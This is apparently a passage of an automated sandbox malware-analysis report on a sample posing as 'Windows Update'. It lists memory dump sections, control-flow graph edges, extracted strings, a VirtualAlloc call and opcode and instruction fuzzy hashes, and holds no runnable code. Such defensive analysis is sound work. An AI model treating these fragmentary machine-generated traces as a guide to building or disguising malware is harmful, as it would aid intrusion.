              • Associated: 0000000E.00000002.2357048192.0000000000B5D000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B66000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B6A000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000C45000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000C48000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000C61000.00000040.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_14_2_9b0000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd
              Similarity
              • API ID: AtomGlobal
              • String ID: ControlOfs$Delphi$Enigma$WndProcPtr
              • API String ID: 2189174293-1257653096
              • Opcode ID: 1dd52d97ec130323e032cec8c461423a2c9077366a7d3d3af280d80c95c168fc
              • Instruction ID: 7336b3a18282359a734f74d263731a37ebb1380db4c9046ef87b6db4aeb2aa06
              • Opcode Fuzzy Hash: 1dd52d97ec130323e032cec8c461423a2c9077366a7d3d3af280d80c95c168fc
              • Instruction Fuzzy Hash: C411A9313103056BEB10BA708CA2B6E77D9DBCA301F5094F4FD019B286EE35DE2A9621

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 23 35700b8-35700cd 48 35700d0 call 35f05df 23->48 49 35700d0 call 122a23a 23->49 50 35700d0 call 35f0606 23->50 51 35700d0 call 122a20c 23->51 25 35700d5-35700f7 28 357010b-35701d5 25->28 29 35700f9-357010a 25->29 45 35701d5 call 35f05df 28->45 46 35701d5 call 3570ae1 28->46 47 35701d5 call 35f0606 28->47 44 35701db-35701de 45->44 46->44 47->44 48->25 49->25 50->25 51->25
              Strings
              Memory Dump Source
              • Source File: 0000000E.00000002.2361523008.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_14_2_3570000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd
              Similarity
              • API ID:
              • String ID: 2Ll$2Ll$5]xk^$E]xk^
              • API String ID: 0-606831587
              • Opcode ID: 6838a7810247bbc2b601a934a4e589f82a4bb260f72147a5867974423addcb21
              • Instruction ID: 3cf3a8788106a1ee3174ca4215a3b647c6f178c1c364eabbbc2c77a704132ee3
              • Opcode Fuzzy Hash: 6838a7810247bbc2b601a934a4e589f82a4bb260f72147a5867974423addcb21
              • Instruction Fuzzy Hash: 9D31D1307053445FD714EBB59822FAE7BA6ABC2608B0484AED0058F791CF35880AC792

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 52 3570118-3570169 57 3570174-357017a 52->57 58 3570181-35701bd 57->58 63 35701c8-35701d5 58->63 66 35701d5 call 35f05df 63->66 67 35701d5 call 3570ae1 63->67 68 35701d5 call 35f0606 63->68 65 35701db-35701de 66->65 67->65 68->65
              Strings
              Memory Dump Source
              • Source File: 0000000E.00000002.2361523008.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_14_2_3570000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd
              Similarity
              • API ID:
              • String ID: 2Ll$2Ll$5]xk^$E]xk^
              • API String ID: 0-606831587
              • Opcode ID: 41d721a93f69046011d0a939d1beddf02f2082ab8b1b0dff3bc1ce388b208bd6
              • Instruction ID: 4432ac5da2d71a665aa55a957f5e6c217e1eb22f048c5bc0b761f29741fe90a1
              • Opcode Fuzzy Hash: 41d721a93f69046011d0a939d1beddf02f2082ab8b1b0dff3bc1ce388b208bd6
              • Instruction Fuzzy Hash: 5711C2347052504FC714EB7AE462EAE77A7ABD2249744846DD0068FB55CF798C0ACBE2

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 127 3570ae1-3570bf1 144 3570bf7-3570bf9 127->144 145 3570bf3 127->145 148 3570c00-3570c07 144->148 146 3570bf5 145->146 147 3570bfb 145->147 146->144 147->148 149 3570c9d-3570dbf 148->149 150 3570c0d-3570c92 148->150 174 3570dc1-3570e31 149->174 175 3570e3b-3570e8e 149->175 150->149 174->175 183 3570e95-3570eaf 175->183 184 3570e90 175->184 186 3570ee6-3570f9b 183->186 187 3570eb1-3570edb 183->187 184->183 198 3571023 186->198 199 3570fa1-3570fdf 186->199 187->186 200 35714bd-35714c8 198->200 199->198 201 35714ce-35714d5 200->201 202 3571028-3571046 200->202 206 3571051-357105c 202->206 207 3571048-357104e 202->207 210 3571473-35714bb 206->210 211 3571062-3571076 206->211 207->206 210->200 213 35710ee-35710ff 211->213 214 3571078-35710aa 211->214 216 3571101-357112b 213->216 217 357114f-357115d 213->217 214->213 216->217 227 357112d-3571147 216->227 219 3571163-3571216 217->219 220 3571471 217->220 240 35712a6-357139d 219->240 241 357121c-357129f 219->241 220->200 227->217 256 35713a3-3571426 240->256 257 357142d 240->257 241->240 256->257 257->220
              Strings
              Memory Dump Source
              • Source File: 0000000E.00000002.2361523008.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_14_2_3570000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd
              Similarity
              • API ID:
              • String ID: \OLl$2Ll
              • API String ID: 0-1463305755
              • Opcode ID: 2acbc879e8c4f3625432d3225f4474141bae04af4f12426f9614db34b1924ddf
              • Instruction ID: e2f4b7f0ac6b549f9383eaff55f2808e19a38c9e0817682574dbf1a7f8c33178
              • Opcode Fuzzy Hash: 2acbc879e8c4f3625432d3225f4474141bae04af4f12426f9614db34b1924ddf
              • Instruction Fuzzy Hash: BE322A34A10219CFDB24DF74D855BEDBBB2BB48308F1045A9D40AAB7A4DB399E85CF41
              Strings
              Memory Dump Source
              • Source File: 0000000E.00000002.2361523008.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_14_2_3570000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd
              Similarity
              • API ID:
              • String ID: :@%l
              • API String ID: 0-1656731533
              • Opcode ID: 71f27bb3139747ab392b1a77b87b94e2ca99859e57f87f208803f9b5ba122965
              • Instruction ID: ccd91ae5b1f9283a13dc81041051f21ec7c2408bc7dc8c32ad7fbaed05b4d655
              • Opcode Fuzzy Hash: 71f27bb3139747ab392b1a77b87b94e2ca99859e57f87f208803f9b5ba122965
              • Instruction Fuzzy Hash: ED31E574B102128FDB04EB75E812BBE37A6AB88208F504039D405D77A5DF3D8D1BCBA1
              APIs
              • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00B5056B
              Memory Dump Source
              • Source File: 0000000E.00000002.2357048192.0000000000B50000.00000040.00000001.01000000.0000000B.sdmp, Offset: 009B0000, based on PE: true
              • Associated: 0000000E.00000002.2357014219.00000000009B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.00000000009C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.00000000009CD000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000A01000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000A07000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000A26000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000A2C000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000AA7000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000ACB000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000AF7000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B01000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B08000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B15000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B17000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B1E000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B23000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B44000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B55000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B5D000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B66000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B6A000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000C45000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000C48000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000C61000.00000040.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_14_2_9b0000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: 32bb7870683b6f7b1e67ed84e24ec12697881852445d4039ebd7a1b9ec058732
              • Instruction ID: 52d47019d4f67e5ca440667085e3130352818e6767d28221ebf437510ace75e9
              • Opcode Fuzzy Hash: 32bb7870683b6f7b1e67ed84e24ec12697881852445d4039ebd7a1b9ec058732
              • Instruction Fuzzy Hash: B7E0E2B6310208ABDB24DE8CE8C4BAE33EDE768311F1084A1FA19D7604D235EC549B61
              Memory Dump Source
              • Source File: 0000000E.00000002.2361523008.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_14_2_3570000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 59a8b68058ffe2d8a9af215685c0fb2afa78526ab3d48ca64233dbcb8e956c55
              • Instruction ID: a1e03899e5b7c78e84acefd746d1a80360f3ff0a3ee2f134c458ea0bbda45e84
              • Opcode Fuzzy Hash: 59a8b68058ffe2d8a9af215685c0fb2afa78526ab3d48ca64233dbcb8e956c55
              • Instruction Fuzzy Hash: E111C22104E7C25FC34387749CA66957FB06F4320874E85CBD094CFAA3C658692DD762
              Memory Dump Source
              • Source File: 0000000E.00000002.2361523008.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_14_2_3570000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bf3252be2dc6a318a089f6c18714063d652ef358b275bd4e804b0fd7defe3a59
              • Instruction ID: d2d30aaf4b1c45571d440f7b689b3ae871274c71c9d9b20a8e5214f0b31c4489
              • Opcode Fuzzy Hash: bf3252be2dc6a318a089f6c18714063d652ef358b275bd4e804b0fd7defe3a59
              • Instruction Fuzzy Hash: 84F0FC32A003046BD714DFB0CC52B9F7BA2EF81614F1081BED545DF2D1DA3198418780
              Memory Dump Source
              • Source File: 0000000E.00000002.2361523008.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_14_2_3570000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f5984c666ebeaf353c09301b9c92297f0e55b1fe2b6454bd80913926200b7cbd
              • Instruction ID: 8e60597dd69aa9a4e6eed4424d801c3dbe04a3fc1f62ba4ec50dc3a86a0f9d29
              • Opcode Fuzzy Hash: f5984c666ebeaf353c09301b9c92297f0e55b1fe2b6454bd80913926200b7cbd
              • Instruction Fuzzy Hash: 1D01FB34625652DFCB00EFB4E05995D7BE2BFC8208B40881CE0958B328EB759909DB42
              Memory Dump Source
              • Source File: 0000000E.00000002.2361523008.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_14_2_3570000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b43cdb40b6d6b8524ed3f0a74fec805d3d231b041ea3a4de4617f97dcb9a0a1c
              • Instruction ID: 6cc749ebeef2ed5866316b966792726eb71e070c63df35fafd72979fb6936ff9
              • Opcode Fuzzy Hash: b43cdb40b6d6b8524ed3f0a74fec805d3d231b041ea3a4de4617f97dcb9a0a1c
              • Instruction Fuzzy Hash: 8BE04F31115750CFC7259F34E0A699A77B1EF5A20836404BEC4868B751E736D442CB40
              Memory Dump Source
              • Source File: 0000000E.00000002.2358519080.0000000001222000.00000040.00000800.00020000.00000000.sdmp, Offset: 01222000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_14_2_1222000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 53d81064209ad5b3b8c3dd88dbefcf6b025924acc84158eb8ee35a55628ba9a9
              • Instruction ID: 88584372de74829cd2c0073fe0915f56268684e2ff79f22cec362310afd54d9e
              • Opcode Fuzzy Hash: 53d81064209ad5b3b8c3dd88dbefcf6b025924acc84158eb8ee35a55628ba9a9
              • Instruction Fuzzy Hash: 39D02E782016E28FE3128B0CC1A4B8A3BE0AB40704F4600FAEC008B7B3C368E880C210
              Memory Dump Source
              • Source File: 0000000E.00000002.2358519080.0000000001222000.00000040.00000800.00020000.00000000.sdmp, Offset: 01222000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_14_2_1222000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1f8a2db1743b5e503bbff9da777af502194db0541a02d65d513d3603a1bb4eff
              • Instruction ID: 67cd40e015036eb7b598dc6ccf2548720cc31fe72569c4cedd6a377605ad36ef
              • Opcode Fuzzy Hash: 1f8a2db1743b5e503bbff9da777af502194db0541a02d65d513d3603a1bb4eff
              • Instruction Fuzzy Hash: 91D05E342012828BDB19DB0CC6D4F5D3BD4AF40705F0644E8BD108B772C3B5E880CA00